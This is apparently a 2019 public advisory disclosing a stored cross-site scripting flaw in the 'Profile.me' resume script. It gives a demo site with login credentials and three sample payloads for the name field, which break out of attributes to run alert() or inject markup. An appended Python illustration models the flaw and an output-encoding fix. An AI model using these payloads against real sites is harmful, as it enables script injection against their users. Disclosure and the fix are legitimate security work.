[*] :: Title: Profile.me - Multiuser profile & resume script Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-05-05
[*] :: Software: Profile.me - Multiuser profile & resume script
[?] :: Technical Details & Description:
# Weak security measures, namely poor filtering of input field data, have been discovered in the «Profile.me - Multiuser profile & resume script» web application.
[?] :: Demo Website:
# https://codecanyon.net/item/profileme-multiuser-profile-resume-script/23743952
# Frontend: http://profileme.pokkho.com
# Backend: http://profileme.pokkho.com/login
# Login/Password (user): quixss/asdasd
[!] :: Special Note:
# After a few injections you'll see that some blocks on the «Users» page are broken due to poor filtering of input field data.
# There are various mechanisms to secure the application. These mechanisms are: ... & Cross-Site Scripting (XSS) Prevention © author
[!] :: For developers:
# Disabling any data changes on demo websites doesn't make your applications more secure. It's good for business and sales, but you are simply double-crossing your clients.
[+] :: PoC [Links]:
# http://profileme.pokkho.com/login (log in as quixss/asdasd)
# http://profileme.pokkho.com/admin/users (marquee)
[+] :: PoC [Stored XSS Injection]:
# Go to the demo website http://profileme.pokkho.com and register a new account (no validation required). Use the «Your Name» field for payload injection. There are probably other vulnerable fields, but they are all disabled on the demo website.
# Sample payload #1: " autofocus onfocus="alert('QUIXSS');"/>
# Sample payload #2: " autofocus onfocus="alert('QUIXSS');window.open('https://twitter.com/quixss');"/><img src="https://i.imgur.com/zRm8R9z.gif">
# Sample payload #3: "></h3></tr></td></table></tr></td></table></div><marquee>QUIXSS
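# Added illustration, not part of the advisory or of the Profile.me code base: the Python below models the two output contexts the sample payloads break out of (an attribute value and an element body) with an assumed template shape, and checks that HTML-encoding the stored name on output keeps the page structure intact while still displaying the name verbatim.

```python
import html
from html.parser import HTMLParser

# Constructed inputs: a benign name plus two of the advisory's sample payloads
# for the «Your Name» field.
SAMPLE_NAMES = [
    "Jane Doe",
    '" autofocus onfocus="alert(\'QUIXSS\');"/>',
    '"></h3></tr></td></table></tr></td></table></div><marquee>QUIXSS',
]

def render_card_unsafe(name: str) -> str:
    """Assumed vulnerable pattern: the stored name is concatenated raw into an
    attribute value and an element body, so a quote or '<' in it rewrites the
    markup (the broken «Users» page blocks the advisory describes)."""
    return f'<input value="{name}"/><h3>{name}</h3>'

def render_card_safe(name: str) -> str:
    """Fix: encode on output for the HTML context. html.escape(quote=True)
    encodes & < > " ' so the name can neither close the attribute nor open a
    tag, yet the browser still displays it exactly as entered."""
    safe = html.escape(name, quote=True)
    return f'<input value="{safe}"/><h3>{safe}</h3>'

class _StructureCollector(HTMLParser):
    """Records every start tag with its attribute names, plus text nodes."""
    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, list[str]]] = []
        self.text: list[str] = []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, sorted(a for a, _ in attrs)))
    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)
    def handle_data(self, data):
        self.text.append(data)

EXPECTED_STRUCTURE = [("input", ["value"]), ("h3", [])]

def _parse(rendered: str) -> _StructureCollector:
    p = _StructureCollector()
    p.feed(rendered)
    p.close()
    return p

def breaks_out(rendered: str) -> bool:
    """True when the name altered the card's structure: an extra tag such as
    <marquee>, or an <input> attribute other than value, such as onfocus."""
    return _parse(rendered).tags != EXPECTED_STRUCTURE

def displayed_name(rendered: str) -> str:
    """Text a browser would show for the card, with entities decoded."""
    return "".join(_parse(rendered).text)
```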